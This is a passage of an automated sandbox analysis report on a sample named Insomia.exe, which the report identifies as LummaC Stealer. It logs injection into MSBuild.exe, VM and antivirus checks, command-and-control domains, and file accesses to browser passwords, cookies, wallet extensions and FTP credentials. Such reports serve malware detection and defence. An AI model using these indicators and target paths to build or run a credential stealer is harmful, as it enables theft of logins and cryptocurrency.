Source: Insomia.exe, 00000000.00000002.2121237108.0000000003411000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Microsoft\|VMWare\|Virtual
Source: MSBuild.exe, 00000002.00000002.3270062584.000000000105C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

API call chain: ExitProcess graph end node

graph_2-14708

Source: C:\Users\user\Desktop\Insomia.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 2_2_00441AA0 LdrInitializeThunk,

2_2_00441AA0

Source: C:\Users\user\Desktop\Insomia.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\Insomia.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\Insomia.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Insomia.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: Insomia.exe, 00000000.00000002.2127928110.0000000004538000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: cloudewahsj.shop
Source: Insomia.exe, 00000000.00000002.2127928110.0000000004538000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: rabidcowse.shop
Source: Insomia.exe, 00000000.00000002.2127928110.0000000004538000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: noisycuttej.shop
Source: Insomia.exe, 00000000.00000002.2127928110.0000000004538000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tirepublicerj.shop
Source: Insomia.exe, 00000000.00000002.2127928110.0000000004538000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: framekgirus.shop
Source: Insomia.exe, 00000000.00000002.2127928110.0000000004538000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: wholersorie.shop
Source: Insomia.exe, 00000000.00000002.2127928110.0000000004538000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: abruptyopsn.shop
Source: Insomia.exe, 00000000.00000002.2127928110.0000000004538000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: nearycrepso.shop
Source: Insomia.exe, 00000000.00000002.2127928110.0000000004538000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: impossiblekdo.click

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Insomia.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 76EFA6F0	Jump to behavior
Source: C:\Users\user\Desktop\Insomia.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\Insomia.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\Insomia.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 445000	Jump to behavior
Source: C:\Users\user\Desktop\Insomia.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 448000	Jump to behavior
Source: C:\Users\user\Desktop\Insomia.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 456000	Jump to behavior
Source: C:\Users\user\Desktop\Insomia.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D4E008	Jump to behavior

Source: C:\Users\user\Desktop\Insomia.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

Jump to behavior

Source: C:\Users\user\Desktop\Insomia.exe	Queries volume information: C:\Users\user\Desktop\Insomia.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Insomia.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Insomia.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 7100, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
